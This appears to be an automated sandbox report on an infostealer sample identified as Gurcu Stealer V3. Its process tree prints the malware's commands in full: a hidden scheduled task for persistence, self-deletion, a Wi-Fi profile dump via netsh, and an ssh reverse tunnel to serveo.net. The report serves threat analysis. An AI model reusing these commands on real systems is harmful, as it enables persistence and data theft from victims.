Analysis
-
max time kernel
165s -
max time network
184s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
28-09-2023 06:39
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20230915-en
General
-
Target
tmp.exe
-
Size
426KB
-
MD5
ef43d260ba94eea5dad184fcb6e1abcf
-
SHA1
2cad3eaa11d5842b430ca28c9d185bc82d7661d1
-
SHA256
8db489ea34fc35ad43552af9629978af98c14b947c058ef1a5d0e645a90c3458
-
SHA512
de879cf97066e6ca3c39200f01407dca79838ce03e2b3280aa37ab725aae96e9a15d6ad3a200ce184d3c1b7102a666c4ae051a8453fbca0ef9f6e38ec0942d0a
-
SSDEEP
6144:3Gd/t/a2zDGVPJXvnzZjDJHb571Kjn1929XDccHa+u9bamBftR0RgW:cRatpvnzZjDv7oj19yTaAmBftR0CW
Malware Config
Signatures
-
Detect Gurcu Stealer V3 payload 4 IoCs
resource yara_rule behavioral2/memory/5112-0-0x00000127F2490000-0x00000127F24FC000-memory.dmp family_gurcu_v3 behavioral2/files/0x0008000000023086-8.dat family_gurcu_v3 behavioral2/files/0x0008000000023086-9.dat family_gurcu_v3 behavioral2/files/0x0008000000023086-17.dat family_gurcu_v3 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation tmp.exe -
Executes dropped EXE 2 IoCs
pid Process 4604 tmp.exe 3324 tmp.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 tmp.exe Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 tmp.exe Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 tmp.exe Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 tmp.exe Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 tmp.exe Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 tmp.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 40 ip-api.com 144 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4616 schtasks.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4740 PING.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4604 tmp.exe 4604 tmp.exe 3324 tmp.exe 3324 tmp.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 5112 tmp.exe Token: SeDebugPrivilege 4604 tmp.exe Token: SeDebugPrivilege 3324 tmp.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 5112 wrote to memory of 4772 5112 tmp.exe 86 PID 5112 wrote to memory of 4772 5112 tmp.exe 86 PID 4772 wrote to memory of 4884 4772 cmd.exe 88 PID 4772 wrote to memory of 4884 4772 cmd.exe 88 PID 4772 wrote to memory of 4740 4772 cmd.exe 90 PID 4772 wrote to memory of 4740 4772 cmd.exe 90 PID 4772 wrote to memory of 4616 4772 cmd.exe 92 PID 4772 wrote to memory of 4616 4772 cmd.exe 92 PID 4772 wrote to memory of 4604 4772 cmd.exe 93 PID 4772 wrote to memory of 4604 4772 cmd.exe 93 PID 4604 wrote to memory of 2640 4604 tmp.exe 94 PID 4604 wrote to memory of 2640 4604 tmp.exe 94 PID 2640 wrote to memory of 3928 2640 cmd.exe 96 PID 2640 wrote to memory of 3928 2640 cmd.exe 96 PID 2640 wrote to memory of 3668 2640 cmd.exe 97 PID 2640 wrote to memory of 3668 2640 cmd.exe 97 PID 2640 wrote to memory of 452 2640 cmd.exe 98 PID 2640 wrote to memory of 452 2640 cmd.exe 98 PID 4604 wrote to memory of 1188 4604 tmp.exe 99 PID 4604 wrote to memory of 1188 4604 tmp.exe 99 PID 1188 wrote to memory of 704 1188 cmd.exe 101 PID 1188 wrote to memory of 704 1188 cmd.exe 101 PID 1188 wrote to memory of 1268 1188 cmd.exe 102 PID 1188 wrote to memory of 1268 1188 cmd.exe 102 PID 1188 wrote to memory of 3972 1188 cmd.exe 103 PID 1188 wrote to memory of 3972 1188 cmd.exe 103 PID 4604 wrote to memory of 1628 4604 tmp.exe 106 PID 4604 wrote to memory of 1628 4604 tmp.exe 106 PID 3324 wrote to memory of 3724 3324 tmp.exe 121 PID 3324 wrote to memory of 3724 3324 tmp.exe 121 PID 3724 wrote to memory of 3892 3724 cmd.exe 125 PID 3724 wrote to memory of 3892 3724 cmd.exe 125 PID 3724 wrote to memory of 4440 3724 cmd.exe 124 PID 3724 wrote to memory of 4440 3724 cmd.exe 124 PID 3724 wrote to memory of 4812 3724 cmd.exe 123 PID 3724 wrote to memory of 4812 3724 cmd.exe 123 PID 3324 wrote to memory of 4492 3324 tmp.exe 126 PID 3324 wrote to memory of 4492 3324 tmp.exe 126 PID 4492 wrote to memory of 492 4492 cmd.exe 128 PID 4492 wrote to memory of 492 4492 cmd.exe 128 PID 4492 wrote to memory of 2656 4492 cmd.exe 129 PID 4492 wrote to memory of 2656 4492 cmd.exe 129 PID 4492 wrote to memory of 4404 4492 cmd.exe 130 PID 4492 wrote to memory of 4404 4492 cmd.exe 130 PID 3324 wrote to memory of 2976 3324 tmp.exe 131 PID 3324 wrote to memory of 2976 3324 tmp.exe 131 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 tmp.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 tmp.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tmp" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\tmp.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:4884
-
-
C:\Windows\system32\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:4740
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "tmp" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:4616
-
-
C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe"C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"4⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:3928
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵PID:3668
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"5⤵PID:452
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"4⤵
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:704
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid5⤵PID:1268
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"5⤵PID:3972
-
-
-
C:\Windows\System32\OpenSSH\ssh.exe"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3263 serveo.net4⤵PID:1628
-
-
-
-
C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exeC:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe1⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:3324 -
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"2⤵
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"3⤵PID:4812
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles3⤵PID:4440
-
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:3892
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"2⤵
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:492
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid3⤵PID:2656
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"3⤵PID:4404
-
-
-
C:\Windows\System32\OpenSSH\ssh.exe"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3263 serveo.net2⤵PID:2976
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
407B
MD5b89137b6bacc6612c5f2acfc5516e555
SHA1e95ff41da385ee31c09501b1dcb90f8d3e89b391
SHA25657fb35c680cb2530393ab3e08cfda5405457a860fe3db8454ff0e5fbd664a1f3
SHA51297c7a535f643c45fa351a6ca9ed57d390805e0523a95574eb72fc2f78d25d116492e758ac7b579ca724aca9bdd711e9aa81dc66c45da43e1d2bb3280fcc13bdd
-
Filesize
847B
MD53308a84a40841fab7dfec198b3c31af7
SHA14e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA51297521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198
-
Filesize
426KB
MD5ef43d260ba94eea5dad184fcb6e1abcf
SHA12cad3eaa11d5842b430ca28c9d185bc82d7661d1
SHA2568db489ea34fc35ad43552af9629978af98c14b947c058ef1a5d0e645a90c3458
SHA512de879cf97066e6ca3c39200f01407dca79838ce03e2b3280aa37ab725aae96e9a15d6ad3a200ce184d3c1b7102a666c4ae051a8453fbca0ef9f6e38ec0942d0a
-
Filesize
426KB
MD5ef43d260ba94eea5dad184fcb6e1abcf
SHA12cad3eaa11d5842b430ca28c9d185bc82d7661d1
SHA2568db489ea34fc35ad43552af9629978af98c14b947c058ef1a5d0e645a90c3458
SHA512de879cf97066e6ca3c39200f01407dca79838ce03e2b3280aa37ab725aae96e9a15d6ad3a200ce184d3c1b7102a666c4ae051a8453fbca0ef9f6e38ec0942d0a
-
Filesize
426KB
MD5ef43d260ba94eea5dad184fcb6e1abcf
SHA12cad3eaa11d5842b430ca28c9d185bc82d7661d1
SHA2568db489ea34fc35ad43552af9629978af98c14b947c058ef1a5d0e645a90c3458
SHA512de879cf97066e6ca3c39200f01407dca79838ce03e2b3280aa37ab725aae96e9a15d6ad3a200ce184d3c1b7102a666c4ae051a8453fbca0ef9f6e38ec0942d0a
-
Filesize
4B
MD5f8037f94e53f17a2cc301033ca86d278
SHA1c477daaf6618c98efb953d559c9efa6c015f58a6
SHA2565b23e77bcbfd48044a8bd56f7689fc325f309690072fe25a5dfe11af0062a130
SHA512633d2e8f4a275ad7aec9282c5ca4e2122d4396fb1868f21147a2864da90661ca3cad33b421cdc6acba20584c401540416fbb3a7cfd52d07d399af191bdc24941